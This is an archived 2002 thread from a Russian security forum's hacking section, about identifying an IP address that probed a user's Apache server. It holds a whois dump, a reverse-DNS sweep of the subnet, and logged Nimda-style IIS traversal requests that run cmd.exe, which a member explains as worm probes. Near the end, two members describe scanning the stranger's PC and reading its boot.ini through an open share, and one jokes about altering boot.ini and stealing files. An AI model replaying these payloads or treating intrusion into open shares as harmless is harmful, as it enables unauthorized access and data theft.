информационная безопасность
без паники и всерьез
 подробно о проектеRambler's Top100
За кого нас держат?Где водятся OGRы
BugTraq.Ru
Русский BugTraq
 Анализ криптографических сетевых... 
 Модель надежности двухузлового... 
 Специальные марковские модели надежности... 
 Три миллиона электронных замков... 
 Doom на газонокосилках 
 Умер Никлаус Вирт 
главная обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / форум / hacking
Имя Пароль
ФОРУМ
если вы видите этот текст, отключите в настройках форума использование JavaScript
регистрация





Легенда:
  новое сообщение
  закрытая нитка
  новое сообщение
  в закрытой нитке
  старое сообщение
  • Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
  • Новичкам также крайне полезно ознакомиться с данным документом.
О, господи! ;) 03.04.02 10:07  Число просмотров: 1015
Автор: iddqd <Юрий> Статус: Member
<"чистая" ссылка> <обсуждение закрыто>
Неужели есть человек, кому Нимда до сих пор не гадила в логи ;))))
<hacking>
217.34.152.89 02.04.02 14:34  
Автор: Kulsha Статус: Незарегистрированный пользователь
<"чистая" ссылка> <обсуждение закрыто>
это чего за ip ?
ктонить встречал его раньше? его может ктонить просканировать ради интереса?
217.34.152.89 03.04.02 11:27  
Автор: ih8u <i hate you> Статус: Member
<"чистая" ссылка> <обсуждение закрыто>
217.34.152.1 - host217-34-152-1.in-addr.btopenworld.com
217.34.152.0 - host217-34-152-0.in-addr.btopenworld.com
217.34.152.4 - host217-34-152-4.in-addr.btopenworld.com
217.34.152.2 - host217-34-152-2.in-addr.btopenworld.com
217.34.152.3 - host217-34-152-3.in-addr.btopenworld.com
217.34.152.6 - host217-34-152-6.in-addr.btopenworld.com
217.34.152.5 - host217-34-152-5.in-addr.btopenworld.com
217.34.152.8 - host217-34-152-8.in-addr.btopenworld.com
217.34.152.7 - host217-34-152-7.in-addr.btopenworld.com
217.34.152.9 - host217-34-152-9.in-addr.btopenworld.com
217.34.152.11 - host217-34-152-11.in-addr.btopenworld.com
217.34.152.10 - host217-34-152-10.in-addr.btopenworld.com
217.34.152.12 - host217-34-152-12.in-addr.btopenworld.com
217.34.152.14 - host217-34-152-14.in-addr.btopenworld.com
217.34.152.13 - host217-34-152-13.in-addr.btopenworld.com
217.34.152.16 - host217-34-152-16.in-addr.btopenworld.com
217.34.152.15 - host217-34-152-15.in-addr.btopenworld.com
217.34.152.18 - host217-34-152-18.in-addr.btopenworld.com
217.34.152.17 - host217-34-152-17.in-addr.btopenworld.com
217.34.152.19 - host217-34-152-19.in-addr.btopenworld.com
217.34.152.21 - host217-34-152-21.in-addr.btopenworld.com
217.34.152.20 - host217-34-152-20.in-addr.btopenworld.com
217.34.152.22 - host217-34-152-22.in-addr.btopenworld.com
217.34.152.24 - host217-34-152-24.in-addr.btopenworld.com
217.34.152.23 - host217-34-152-23.in-addr.btopenworld.com
217.34.152.26 - host217-34-152-26.in-addr.btopenworld.com
217.34.152.25 - host217-34-152-25.in-addr.btopenworld.com
217.34.152.27 - host217-34-152-27.in-addr.btopenworld.com
217.34.152.28 - host217-34-152-28.in-addr.btopenworld.com
217.34.152.29 - host217-34-152-29.in-addr.btopenworld.com
217.34.152.31 - host217-34-152-31.in-addr.btopenworld.com
217.34.152.30 - host217-34-152-30.in-addr.btopenworld.com
217.34.152.32 - host217-34-152-32.in-addr.btopenworld.com
217.34.152.34 - host217-34-152-34.in-addr.btopenworld.com
217.34.152.33 - host217-34-152-33.in-addr.btopenworld.com
217.34.152.36 - host217-34-152-36.in-addr.btopenworld.com
217.34.152.35 - host217-34-152-35.in-addr.btopenworld.com
217.34.152.37 - host217-34-152-37.in-addr.btopenworld.com
217.34.152.38 - host217-34-152-38.in-addr.btopenworld.com
217.34.152.39 - host217-34-152-39.in-addr.btopenworld.com
217.34.152.41 - host217-34-152-41.in-addr.btopenworld.com
217.34.152.40 - host217-34-152-40.in-addr.btopenworld.com
217.34.152.42 - host217-34-152-42.in-addr.btopenworld.com
217.34.152.44 - host217-34-152-44.in-addr.btopenworld.com
217.34.152.43 - host217-34-152-43.in-addr.btopenworld.com
217.34.152.46 - host217-34-152-46.in-addr.btopenworld.com
217.34.152.45 - host217-34-152-45.in-addr.btopenworld.com
217.34.152.47 - host217-34-152-47.in-addr.btopenworld.com
217.34.152.48 - host217-34-152-48.in-addr.btopenworld.com
217.34.152.49 - host217-34-152-49.in-addr.btopenworld.com
217.34.152.51 - host217-34-152-51.in-addr.btopenworld.com
217.34.152.50 - host217-34-152-50.in-addr.btopenworld.com
217.34.152.52 - host217-34-152-52.in-addr.btopenworld.com
217.34.152.54 - host217-34-152-54.in-addr.btopenworld.com
217.34.152.53 - host217-34-152-53.in-addr.btopenworld.com
217.34.152.56 - host217-34-152-56.in-addr.btopenworld.com
217.34.152.55 - host217-34-152-55.in-addr.btopenworld.com
217.34.152.57 - host217-34-152-57.in-addr.btopenworld.com
217.34.152.58 - host217-34-152-58.in-addr.btopenworld.com
217.34.152.59 - host217-34-152-59.in-addr.btopenworld.com
217.34.152.61 - host217-34-152-61.in-addr.btopenworld.com
217.34.152.60 - host217-34-152-60.in-addr.btopenworld.com
217.34.152.62 - host217-34-152-62.in-addr.btopenworld.com
217.34.152.64 - host217-34-152-64.in-addr.btopenworld.com
217.34.152.63 - host217-34-152-63.in-addr.btopenworld.com
217.34.152.66 - host217-34-152-66.in-addr.btopenworld.com
217.34.152.65 - host217-34-152-65.in-addr.btopenworld.com
217.34.152.67 - host217-34-152-67.in-addr.btopenworld.com
217.34.152.68 - host217-34-152-68.in-addr.btopenworld.com
217.34.152.69 - host217-34-152-69.in-addr.btopenworld.com
217.34.152.71 - host217-34-152-71.in-addr.btopenworld.com
217.34.152.70 - host217-34-152-70.in-addr.btopenworld.com
217.34.152.72 - host217-34-152-72.in-addr.btopenworld.com
217.34.152.74 - host217-34-152-74.in-addr.btopenworld.com
217.34.152.73 - host217-34-152-73.in-addr.btopenworld.com
217.34.152.76 - host217-34-152-76.in-addr.btopenworld.com
217.34.152.75 - host217-34-152-75.in-addr.btopenworld.com
217.34.152.77 - host217-34-152-77.in-addr.btopenworld.com
217.34.152.78 - host217-34-152-78.in-addr.btopenworld.com
217.34.152.79 - host217-34-152-79.in-addr.btopenworld.com
217.34.152.81 - host217-34-152-81.in-addr.btopenworld.com
217.34.152.82 - host217-34-152-82.in-addr.btopenworld.com
217.34.152.80 - host217-34-152-80.in-addr.btopenworld.com
217.34.152.84 - host217-34-152-84.in-addr.btopenworld.com
217.34.152.83 - host217-34-152-83.in-addr.btopenworld.com
217.34.152.86 - host217-34-152-86.in-addr.btopenworld.com
217.34.152.85 - host217-34-152-85.in-addr.btopenworld.com
217.34.152.87 - host217-34-152-87.in-addr.btopenworld.com
217.34.152.88 - host217-34-152-88.in-addr.btopenworld.com
217.34.152.89 - host217-34-152-89.in-addr.btopenworld.com
217.34.152.91 - host217-34-152-91.in-addr.btopenworld.com
217.34.152.90 - host217-34-152-90.in-addr.btopenworld.com
217.34.152.92 - host217-34-152-92.in-addr.btopenworld.com
217.34.152.94 - host217-34-152-94.in-addr.btopenworld.com
217.34.152.93 - host217-34-152-93.in-addr.btopenworld.com
217.34.152.96 - host217-34-152-96.in-addr.btopenworld.com
217.34.152.95 - host217-34-152-95.in-addr.btopenworld.com
217.34.152.97 - host217-34-152-97.in-addr.btopenworld.com
217.34.152.98 - host217-34-152-98.in-addr.btopenworld.com
217.34.152.99 - host217-34-152-99.in-addr.btopenworld.com
217.34.152.101 - host217-34-152-101.in-addr.btopenworld.com
217.34.152.100 - host217-34-152-100.in-addr.btopenworld.com
217.34.152.102 - host217-34-152-102.in-addr.btopenworld.com
217.34.152.104 - host217-34-152-104.in-addr.btopenworld.com
217.34.152.103 - host217-34-152-103.in-addr.btopenworld.com
217.34.152.106 - host217-34-152-106.in-addr.btopenworld.com
217.34.152.105 - host217-34-152-105.in-addr.btopenworld.com
217.34.152.107 - host217-34-152-107.in-addr.btopenworld.com
217.34.152.108 - host217-34-152-108.in-addr.btopenworld.com
217.34.152.109 - host217-34-152-109.in-addr.btopenworld.com
217.34.152.111 - host217-34-152-111.in-addr.btopenworld.com
217.34.152.110 - host217-34-152-110.in-addr.btopenworld.com
217.34.152.112 - host217-34-152-112.in-addr.btopenworld.com
217.34.152.114 - host217-34-152-114.in-addr.btopenworld.com
217.34.152.116 - host217-34-152-116.in-addr.btopenworld.com
217.34.152.113 - host217-34-152-113.in-addr.btopenworld.com
217.34.152.115 - host217-34-152-115.in-addr.btopenworld.com
217.34.152.117 - host217-34-152-117.in-addr.btopenworld.com
217.34.152.118 - host217-34-152-118.in-addr.btopenworld.com
217.34.152.119 - host217-34-152-119.in-addr.btopenworld.com
217.34.152.121 - host217-34-152-121.in-addr.btopenworld.com
217.34.152.120 - host217-34-152-120.in-addr.btopenworld.com
217.34.152.124 - host217-34-152-124.in-addr.btopenworld.com
217.34.152.122 - host217-34-152-122.in-addr.btopenworld.com
217.34.152.126 - host217-34-152-126.in-addr.btopenworld.com
217.34.152.123 - host217-34-152-123.in-addr.btopenworld.com
217.34.152.127 - host217-34-152-127.in-addr.btopenworld.com
217.34.152.125 - host217-34-152-125.in-addr.btopenworld.com
217.34.152.128 - host217-34-152-128.in-addr.btopenworld.com
217.34.152.129 - host217-34-152-129.in-addr.btopenworld.com
217.34.152.131 - host217-34-152-131.in-addr.btopenworld.com
217.34.152.130 - host217-34-152-130.in-addr.btopenworld.com
217.34.152.134 - host217-34-152-134.in-addr.btopenworld.com
217.34.152.132 - host217-34-152-132.in-addr.btopenworld.com
217.34.152.136 - host217-34-152-136.in-addr.btopenworld.com
217.34.152.133 - host217-34-152-133.in-addr.btopenworld.com
217.34.152.137 - host217-34-152-137.in-addr.btopenworld.com
217.34.152.135 - host217-34-152-135.in-addr.btopenworld.com
217.34.152.139 - host217-34-152-139.in-addr.btopenworld.com
217.34.152.138 - host217-34-152-138.in-addr.btopenworld.com
217.34.152.141 - host217-34-152-141.in-addr.btopenworld.com
217.34.152.140 - host217-34-152-140.in-addr.btopenworld.com
217.34.152.144 - host217-34-152-144.in-addr.btopenworld.com
217.34.152.142 - host217-34-152-142.in-addr.btopenworld.com
217.34.152.146 - host217-34-152-146.in-addr.btopenworld.com
217.34.152.143 - host217-34-152-143.in-addr.btopenworld.com
217.34.152.145 - host217-34-152-145.in-addr.btopenworld.com
217.34.152.147 - host217-34-152-147.in-addr.btopenworld.com
217.34.152.149 - host217-34-152-149.in-addr.btopenworld.com
217.34.152.148 - host217-34-152-148.in-addr.btopenworld.com
217.34.152.151 - host217-34-152-151.in-addr.btopenworld.com
217.34.152.150 - host217-34-152-150.in-addr.btopenworld.com
217.34.152.154 - host217-34-152-154.in-addr.btopenworld.com
217.34.152.152 - host217-34-152-152.in-addr.btopenworld.com
217.34.152.156 - host217-34-152-156.in-addr.btopenworld.com
217.34.152.153 - host217-34-152-153.in-addr.btopenworld.com
217.34.152.155 - host217-34-152-155.in-addr.btopenworld.com
217.34.152.157 - host217-34-152-157.in-addr.btopenworld.com
217.34.152.159 - host217-34-152-159.in-addr.btopenworld.com
217.34.152.158 - host217-34-152-158.in-addr.btopenworld.com
217.34.152.161 - host217-34-152-161.in-addr.btopenworld.com
217.34.152.160 - host217-34-152-160.in-addr.btopenworld.com
217.34.152.164 - host217-34-152-164.in-addr.btopenworld.com
217.34.152.162 - host217-34-152-162.in-addr.btopenworld.com
217.34.152.166 - host217-34-152-166.in-addr.btopenworld.com
217.34.152.163 - host217-34-152-163.in-addr.btopenworld.com
217.34.152.165 - host217-34-152-165.in-addr.btopenworld.com
217.34.152.167 - host217-34-152-167.in-addr.btopenworld.com
217.34.152.169 - host217-34-152-169.in-addr.btopenworld.com
217.34.152.168 - host217-34-152-168.in-addr.btopenworld.com
217.34.152.171 - host217-34-152-171.in-addr.btopenworld.com
217.34.152.170 - host217-34-152-170.in-addr.btopenworld.com
217.34.152.174 - host217-34-152-174.in-addr.btopenworld.com
217.34.152.172 - host217-34-152-172.in-addr.btopenworld.com
217.34.152.176 - host217-34-152-176.in-addr.btopenworld.com
217.34.152.173 - host217-34-152-173.in-addr.btopenworld.com
217.34.152.175 - host217-34-152-175.in-addr.btopenworld.com
217.34.152.177 - host217-34-152-177.in-addr.btopenworld.com
217.34.152.179 - host217-34-152-179.in-addr.btopenworld.com
217.34.152.178 - host217-34-152-178.in-addr.btopenworld.com
217.34.152.181 - host217-34-152-181.in-addr.btopenworld.com
217.34.152.180 - host217-34-152-180.in-addr.btopenworld.com
217.34.152.184 - host217-34-152-184.in-addr.btopenworld.com
217.34.152.182 - host217-34-152-182.in-addr.btopenworld.com
217.34.152.186 - host217-34-152-186.in-addr.btopenworld.com
217.34.152.183 - host217-34-152-183.in-addr.btopenworld.com
217.34.152.185 - host217-34-152-185.in-addr.btopenworld.com
217.34.152.187 - host217-34-152-187.in-addr.btopenworld.com
217.34.152.196 - host217-34-152-196.in-addr.btopenworld.com
217.34.152.189 - host217-34-152-189.in-addr.btopenworld.com
217.34.152.193 - host217-34-152-193.in-addr.btopenworld.com
217.34.152.188 - host217-34-152-188.in-addr.btopenworld.com
217.34.152.191 - host217-34-152-191.in-addr.btopenworld.com
217.34.152.190 - host217-34-152-190.in-addr.btopenworld.com
217.34.152.194 - host217-34-152-194.in-addr.btopenworld.com
217.34.152.192 - host217-34-152-192.in-addr.btopenworld.com
217.34.152.195 - host217-34-152-195.in-addr.btopenworld.com
217.34.152.197 - host217-34-152-197.in-addr.btopenworld.com
217.34.152.199 - host217-34-152-199.in-addr.btopenworld.com
217.34.152.206 - host217-34-152-206.in-addr.btopenworld.com
217.34.152.203 - host217-34-152-203.in-addr.btopenworld.com
217.34.152.198 - host217-34-152-198.in-addr.btopenworld.com
217.34.152.201 - host217-34-152-201.in-addr.btopenworld.com
217.34.152.202 - host217-34-152-202.in-addr.btopenworld.com
217.34.152.204 - host217-34-152-204.in-addr.btopenworld.com
217.34.152.200 - host217-34-152-200.in-addr.btopenworld.com
217.34.152.205 - host217-34-152-205.in-addr.btopenworld.com
217.34.152.207 - host217-34-152-207.in-addr.btopenworld.com
217.34.152.209 - host217-34-152-209.in-addr.btopenworld.com
217.34.152.216 - host217-34-152-216.in-addr.btopenworld.com
217.34.152.213 - host217-34-152-213.in-addr.btopenworld.com
217.34.152.208 - host217-34-152-208.in-addr.btopenworld.com
217.34.152.211 - host217-34-152-211.in-addr.btopenworld.com
217.34.152.212 - host217-34-152-212.in-addr.btopenworld.com
217.34.152.214 - host217-34-152-214.in-addr.btopenworld.com
217.34.152.210 - host217-34-152-210.in-addr.btopenworld.com
217.34.152.215 - host217-34-152-215.in-addr.btopenworld.com
217.34.152.217 - host217-34-152-217.in-addr.btopenworld.com
217.34.152.219 - host217-34-152-219.in-addr.btopenworld.com
217.34.152.226 - host217-34-152-226.in-addr.btopenworld.com
217.34.152.223 - host217-34-152-223.in-addr.btopenworld.com
217.34.152.218 - host217-34-152-218.in-addr.btopenworld.com
217.34.152.221 - host217-34-152-221.in-addr.btopenworld.com
217.34.152.222 - host217-34-152-222.in-addr.btopenworld.com
217.34.152.224 - host217-34-152-224.in-addr.btopenworld.com
217.34.152.220 - host217-34-152-220.in-addr.btopenworld.com
217.34.152.225 - host217-34-152-225.in-addr.btopenworld.com
217.34.152.227 - host217-34-152-227.in-addr.btopenworld.com
217.34.152.229 - host217-34-152-229.in-addr.btopenworld.com
217.34.152.236 - host217-34-152-236.in-addr.btopenworld.com
217.34.152.233 - host217-34-152-233.in-addr.btopenworld.com
217.34.152.228 - host217-34-152-228.in-addr.btopenworld.com
217.34.152.231 - host217-34-152-231.in-addr.btopenworld.com
217.34.152.232 - host217-34-152-232.in-addr.btopenworld.com
217.34.152.234 - host217-34-152-234.in-addr.btopenworld.com
217.34.152.230 - host217-34-152-230.in-addr.btopenworld.com
217.34.152.235 - host217-34-152-235.in-addr.btopenworld.com
217.34.152.237 - host217-34-152-237.in-addr.btopenworld.com
217.34.152.239 - host217-34-152-239.in-addr.btopenworld.com
217.34.152.246 - host217-34-152-246.in-addr.btopenworld.com
217.34.152.243 - host217-34-152-243.in-addr.btopenworld.com
217.34.152.238 - host217-34-152-238.in-addr.btopenworld.com
217.34.152.241 - host217-34-152-241.in-addr.btopenworld.com
217.34.152.242 - host217-34-152-242.in-addr.btopenworld.com
217.34.152.244 - host217-34-152-244.in-addr.btopenworld.com
217.34.152.240 - host217-34-152-240.in-addr.btopenworld.com
217.34.152.245 - host217-34-152-245.in-addr.btopenworld.com
217.34.152.247 - host217-34-152-247.in-addr.btopenworld.com
217.34.152.254 - host217-34-152-254.in-addr.btopenworld.com
217.34.152.249 - host217-34-152-249.in-addr.btopenworld.com
217.34.152.253 - host217-34-152-253.in-addr.btopenworld.com
217.34.152.248 - host217-34-152-248.in-addr.btopenworld.com
217.34.152.251 - host217-34-152-251.in-addr.btopenworld.com
217.34.152.252 - host217-34-152-252.in-addr.btopenworld.com
217.34.152.250 - host217-34-152-250.in-addr.btopenworld.com
217.34.152.255 - host217-34-152-255.in-addr.btopenworld.com
Инфа о 217.34.152.89 02.04.02 16:16  
Автор: Renkvil <Boris> Статус: Member
Отредактировано 02.04.02 18:21  Количество правок: 1
<"чистая" ссылка> <обсуждение закрыто>
> это чего за ip ?

Во Whois же было ясно написано:
inetnum: 217.32.0.0 - 217.47.255.255
netname: UK-BT-20000920
descr: BT Public Internet Service
descr: Provider Local Registry
country: GB
...
descr: BT Public Internet Service

Pool английского провайдера.
Возможно и даже очень, что IP динамический.

> ктонить встречал его раньше? его может ктонить
> просканировать ради интереса?

А что ты сам не сканируешь?
И как ты на него вышел?

Порты
135
139
445
1025
5000

W2K или XP
boot.ini сказал что Windows XP Home Edition

Диск С и ещё одна папка расшарены...

Вообщем в лучших традициях Windows...
посмотрел логи 03.04.02 07:59  
Автор: Kulsha Статус: Незарегистрированный пользователь
<"чистая" ссылка> <обсуждение закрыто>
виндового апача, и вижу следующее:
217.34.152.89 - - [02/Apr/2002:15:47:23 +0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 266
217.34.152.89 - - [02/Apr/2002:15:47:24 +0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
217.34.152.89 - - [02/Apr/2002:15:47:24 +0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
217.34.152.89 - - [02/Apr/2002:15:47:25 +0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
217.34.152.89 - - [02/Apr/2002:15:47:26 +0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
217.34.152.89 - - [02/Apr/2002:15:47:26 +0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
217.34.152.89 - - [02/Apr/2002:15:47:27 +0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
217.34.152.89 - - [02/Apr/2002:15:47:28 +0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
217.34.152.89 - - [02/Apr/2002:15:47:29 +0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
217.34.152.89 - - [02/Apr/2002:15:47:29 +0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
217.34.152.89 - - [02/Apr/2002:15:47:30 +0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
217.34.152.89 - - [02/Apr/2002:15:47:31 +0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 348
217.34.152.89 - - [02/Apr/2002:15:47:31 +0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 348
217.34.152.89 - - [02/Apr/2002:15:47:32 +0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
217.34.152.89 - - [02/Apr/2002:15:47:33 +0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266


а до этого на серваке похожий лог был, вот мне и стало интересно кто енто
О, господи! ;) 03.04.02 10:07  
Автор: iddqd <Юрий> Статус: Member
<"чистая" ссылка> <обсуждение закрыто>
Неужели есть человек, кому Нимда до сих пор не гадила в логи ;))))
ну вернее.. 03.04.02 10:39  
Автор: Kulsha Статус: Незарегистрированный пользователь
<"чистая" ссылка> <обсуждение закрыто>
я понял что это вирус , но нет у меня его на компе.....
ну вернее.. 03.04.02 11:08  
Автор: iddqd <Юрий> Статус: Member
<"чистая" ссылка> <обсуждение закрыто>
> я понял что это вирус , но нет у меня его на компе.....
Я разве сказал, что он у тебя на компе?

Короче, объясняю, чтоб не было больше вопросов:
Те урлы, что ты видел в логах - любимые мелкософтовские дыры (доступ предосталяет IIS), через которые осуществляется удаленное выполнение команд на машине жертвы и, соответственно, ее заражение. Нимда, тупо перебирает подсеть и ломится в каждую включеную машину, независимо от оси и веб-стервера, работающих на ней.

З.Ы. Прошу больше не задавать вопросов, итак все разжевал.
сенкс, прошу прощения за тупость 03.04.02 11:24  
Автор: Kulsha Статус: Незарегистрированный пользователь
<"чистая" ссылка> <обсуждение закрыто>
енто ты про что?! 03.04.02 10:33  
Автор: Kulsha Статус: Незарегистрированный пользователь
<"чистая" ссылка> <обсуждение закрыто>
Whois 02.04.02 14:54  
Автор: Glory <Mr. Glory> Статус: Elderman
<"чистая" ссылка> <обсуждение закрыто>
% This is the RIPE Whois server.
% The objects are in RPSL format.
% Please visit http://www.ripe.net/rpsl for more information.
% Rights restricted by copyright.
% See http://www.ripe.net/ripencc/pub-services/db/copyright.html

inetnum: 217.32.0.0 - 217.47.255.255
netname: UK-BT-20000920
descr: BT Public Internet Service
descr: Provider Local Registry
country: GB
admin-c: FLS15-RIPE
tech-c: FLS15-RIPE
tech-c: CS940-RIPE
tech-c: DT1144-RIPE
tech-c: AT4485-RIPE
tech-c: OR2288-RIPE
status: ALLOCATED PA
mnt-by: RIPE-NCC-HM-MNT
mnt-lower: BTNET-MNT
mnt-routes: BTNET-MNT
changed: hostmaster@ripe.net 20000920
changed: hostmaster@ripe.net 20001113
changed: hostmaster@ripe.net 20010620
changed: lir-help@ripe.net 20011214
source: RIPE

route: 217.32.0.0/12
descr: BT Public Internet Service
origin: AS2856
remarks: Please send abuse notification to abuse@bt.net
remarks: PLEASE DIRECT ALL QUERIES TO support@bt.net
mnt-by: BTNET-MNT
changed: Jas.Gill@bt.net 20000921
source: RIPE

role: FIRST LINE SUPPORT
address: pp GB1J
address: Alexander Graham Bell House
address: 1 Lochside View
address: Edinburgh Park
address: Edinburgh
address: Midlothian
address: EH12 9DH
address: GB
phone: +44 131 345 6577
fax-no: +44 131 345 8704
e-mail: gary.turnbull@bt.com
trouble: 1st Line Support
admin-c: GT4879-RIPE
tech-c: GT4879-RIPE
nic-hdl: FLS15-RIPE
mnt-by: BTNET-MNT
changed: preston.dialip@bt.com 20001108
changed: preston.dialip@bt.com 20010607
changed: gary.turnbull@bt.com 20020209
source: RIPE

person: Clive Stones
address: A3010 Westside
address: London Road
address: Apsley
address: Hemel Hempstead
address: HP3 9YF
phone: +44 1442 29 4591
e-mail: ipmaster@bt.com
nic-hdl: CS940-RIPE
notify: Tony.Arora@bt.net
changed: Tony.Arora@bt.net 19971001
changed: ipmaster@bt.com 20010705
source: RIPE

person: Dave Trickett
address: A3010 Westside
address: London Road
address: Apsley
address: Hemel Hempstead
address: HP3 9YF
phone: +44 1442 29 4563
e-mail: ipmaster@bt.com
nic-hdl: DT1144-RIPE
changed: ipmaster@bt.net 19990910
changed: ipmaster@bt.com 20010705
source: RIPE

person: Allen Turner
address: Room 205 pp C
address: Telephone Exchange
address: 176-184 Moor Lane
address: Preston
address: Lancashire
address: PR1 1BA
address: UK
phone: +44 1772 267836
fax-no: +44 1772 886263
e-mail: preston.dialip@bt.com
nic-hdl: AT4485-RIPE
changed: support@bt.net 20000531
changed: preston.dialip@bt.com 20010911
source: RIPE

person: Olwen Ross
address: Room 205 pp C
address: Telephone Exchange
address: 176-184 Moor Lane
address: Preston
address: Lancashire
address: PR1 1BA
address: UK
phone: +44 1772 267841
fax-no: +44 1772 886263
e-mail: preston.dialip@bt.com
nic-hdl: OR2288-RIPE
changed: preston.dialip@bt.com 20010524
changed: preston.dialip@bt.com 20010911
source: RIPE


Открыт 139 порт.
но это... 02.04.02 14:56  
Автор: Kulsha Статус: Незарегистрированный пользователь
<"чистая" ссылка> <обсуждение закрыто>
похоже провайдер который выкупил целую сетку....... а вот этот ip могет быть и диалаповским?? или нет?
...юзер, подконнекченный к вышеуказанному прову. 02.04.02 15:59  
Автор: Glory <Mr. Glory> Статус: Elderman
<"чистая" ссылка> <обсуждение закрыто>
> похоже провайдер который выкупил целую сетку....... а вот
> этот ip могет быть и диалаповским?? или нет?
может.
У него C: расшарен с полным доступом. Ща залез, решил ему boot.ini подправить и файла спиздить какого-нить. 8))).
1




Rambler's Top100
Рейтинг@Mail.ru


  Copyright © 2001-2024 Dmitry Leonov   Page build time: 0 s   Design: Vadim Derkach